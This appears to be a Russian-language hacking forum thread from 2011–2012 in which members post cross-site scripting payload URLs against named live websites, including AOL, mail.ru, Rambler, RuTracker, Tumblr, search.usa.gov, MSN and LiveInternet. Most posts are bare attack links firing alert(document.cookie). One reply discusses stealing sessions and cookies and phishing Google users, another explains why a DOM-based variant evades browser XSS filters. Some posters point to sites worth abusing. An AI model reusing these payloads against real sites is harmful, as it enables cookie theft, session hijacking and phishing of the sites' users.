
24.11.2011, 13:31
|
|
Новичок
Регистрация: 26.02.2011
Сообщений: 0
С нами:
8004566
Репутация:
-5
|
|
Код:
http://autos.aol.com/cars-Buick-Enclave-2012-foo__bla-xss-6619">alert%2528document.cookie%2529/best-deal/
|
|
|

25.11.2011, 00:18
|
|
Познающий
Регистрация: 24.11.2010
Сообщений: 37
С нами:
8139926
Репутация:
0
|
|
http://minigames.mail.ru/#game&ident=durak
Уязвимо поле "Имя"
">alert(/XSS/)
|
|
|

28.11.2011, 15:01
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
http://horoscopes.rambler.ru/psychology.html?id=1174592&sec=1174580">alert('XSS')
|
|
|

05.01.2012, 00:57
|
|
Участник форума
Регистрация: 01.09.2011
Сообщений: 134
С нами:
7735286
Репутация:
1
|
|
Крупнейший русскоязычный битторрент трекер.
Код:
http://pm.rutracker.org/forum/privmsg.php?mode=post">alert(document.cookie)
|
|
|

05.01.2012, 02:43
|
|
Участник форума
Регистрация: 01.09.2011
Сообщений: 134
С нами:
7735286
Репутация:
1
|
|
Рамблер.
Код:
http://horoscopes.rambler.ru/names.html?rubric=0&words=test">alert('xss')
Код:
http://help.rambler.ru/1/search/avia/?set=help&query=111">alert('xss')
Код:
http://planeta.rambler.ru/abuse.html?url=">alert('xss')
|
|
|

05.01.2012, 06:07
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от kravch_v
Google XSS!
Сообщение от kravch_v
Кибер, сессию и куки спереть реально.
Было бы интересно почитать, как это сделать. JS выполняется даже не на поддомене, а на googleusercontent.com. Кроме опен-редиректа и фишинга юзеров гугла не могу придумать варианты использования этого бага.
|
|
|

08.01.2012, 13:03
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Tumblr - сервис микроблоггинга тИЦ 3600 PR 8
Код HTML:
https://www.tumblr.com/register/join_tumblr?referring_blog=usagov%22%3E%3Cscript%3Ealert()%3C/script%3E
P.S. Достаточно известный сервис, можно юзнуть
--
USA Government
тИЦ 350 PR 10
Код:
http://search.usa.gov/search/news?affiliate=usa.govblog&locale=en&m=false&query=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&tbs=h
P.S. Тут есть ПП, поэтому может кому понадобится.
|
|
|

19.01.2012, 05:54
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Ещё один msn.com
http://ringtones.nl.msn.com/games.php?rtch=1&rtlo=41992"/>
|
|
|

19.01.2012, 09:58
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от dev1k
Ещё один msn.com
http://ringtones.nl.
msn.com
/games.php?rtch=1&rtlo=41992
"/>
Это не обычная пассивка, а DOM-based, поэтому защита от XSS в браузерах на нее не сработает.
Со страницы вызывается скрипт http://www.ringtonio.nl/javagames/?..., уязвимый к XSS в реферере.
Данные из реферера выводятся в двух местах:
Сообщение от None
d.writeln('window.open (bd+"/send/javagame?id="+nr+"&clx=1&rths=0&brpc=&rtlo=
41992\"/>
","sendpop","toolbar=no,location=no,directories=no ,status=yes,menubar=no,scrollbars=yes,resizable=no ,copyhistory=no,width=600,height=450,screenX=0,scr eenY=0,top=0,left=0");');
Сообщение от None
d.writeln('[/COLOR][/B]
">');
Видно, что кавычки экранируются. Но это происходит внутри строки в функции вывода, поэтому на странице экранирования не будет.
В примере используется второй вариант вывода - внутри тега input. Но зачем лишние символы?
http://ringtones.nl.msn.com/games.php?rtch=1&rtlo=41992">[/COLOR]
Без них все работает нормально:
[B]http://ringtones.nl.msn.com/games.php?rtlo=">
|
|
|

19.01.2012, 19:04
|
|
Познающий
Регистрация: 20.07.2011
Сообщений: 50
С нами:
7797206
Репутация:
31
|
|
liveinternet.ru
Код:
http://www.liveinternet.ru/tests.php?cmd=show&session_id=7f00c824a22d703516ea5e7e94fc4a1b&order=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
Код:
http://www.liveinternet.ru/search/?q=">alert(document.cookie)
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|